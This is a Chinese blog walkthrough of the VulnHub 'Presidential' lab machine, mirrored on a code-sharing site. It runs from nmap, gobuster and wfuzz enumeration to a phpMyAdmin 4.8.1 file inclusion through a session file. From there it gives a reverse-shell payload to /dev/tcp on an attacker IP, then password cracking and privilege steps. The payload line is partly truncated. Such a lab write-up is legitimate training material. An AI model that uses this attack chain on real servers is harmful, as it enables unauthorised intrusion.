码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • vulnhub靶机Presidential


    靶机地址:https://download.vulnhub.com/presidential/Presidential.ova

    主机发现

    arp-scan -l

    端口扫描

    nmap --min-rate 10000 192.168.21.150

    端口服务扫描

    nmap -sV -sT -O -p80 192.168.21.150

    漏洞扫描

    nmap --script=vuln -p80 192.168.21.150

    只有一个端口

    目录扫描

    gobuster dir -u http://192.168.21.150 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

    这个没用

    换个工具扫一下

    dirsearch -u "http://192.168.21.150/" -e *

    这里面先去看config

    好东西哦

    这里只能扫到80端口

    接下来就只能去找一下域名了

    修改域名,再扫一遍

    gobuster dir -u http://192.168.21.150/ -w SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt

    扫不出来,只剩下子域名爆破

    wfuzz -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -H "Host: FUZZ.votenow.local" --hw 854 --hc 400 votenow.local

    改host访问

    登入就行

    好东西

    这里先放着大概率不行的

    版本

    先去看看有没有洞

    这个版本是4.8.1

    啊这这个是winddows的

    下一个应该就是linux的了

    过程很清楚

    这里需要包含cookie

    jn284slhmdsjnbel58uruk855v80nbi1

    包含session

    http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_jn284slhmdsjnbel58uruk855v80nbi1(讲sess后面替换)

    成功了,反弹shell(要登出一下,因为session会冲突只触发第一次的php命令)

    select '& /dev/tcp/192.168.21.131/666 0>&1");exit;?>'

    Session

    挂监听

    反弹成功

    信息收集

    getcap -r / 2>/dev/null

    找查看开启capabilities的工具(capabilities资料:Linux Capabilities 简介 - sparkdev - 博客园 (cnblogs.com))

    有两个ping和tars个软件,去https://gtfobins.github.io/查一下

    坏了没有提权的机会,去看一下权限的组了

    ???

    小脑萎缩了

    发现了一件事,进错用户了

    去admin(root大概率进不去),想起来了admin这里要密码密码在数据库里面出现过

    啊啊啊啊

    暴力破解,建议用vim写进去,直接重定向会寄

    Emmm各种花式大爆炸

    去网上查了一下发现要影子文件还要passwd文件

    我们拿到的其实是影子文件加密后的密码3

    发现我有台机子就是不行

    换了一台就好了(这就是传说中的水土不服?)

    Passwd在前影子在后写进心得文件

    登入admin

    信息收集(应该大差不差)

    还是一样的吧root用户的密码爆破出来

    发现不行,看看使用ssh

    Emm真有ssh之前没扫出来

    确实有,还是要多扫即便

    改权限(反弹shell我连不上就吧文件复制下来用攻击机连的)

    ok

  • 相关阅读:
    uni-app——如何阻止事件冒泡
    头疼!卷积神经网络是什么?CNN结构、训练与优化一文全解
    codeforces:E. Madoka and The Best University【因数list + 分析拆解 + 公因数特性 + 欧拉函数】
    ECS通过DNAT将C非专线网段并网
    【LCM(潜在一致性模型)-5步即可高质量出图】
    VcXsrv Releases 21.1.13 更新发布了~~
    IPv4 NAT(含Cisco配置)
    38Java Math类
    OpenFOAM:并行区域划分理解(Domain Decomposition)
    天书夜读笔记——内存分页机制
  • 原文地址:https://blog.csdn.net/m0_73248913/article/details/134512462
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号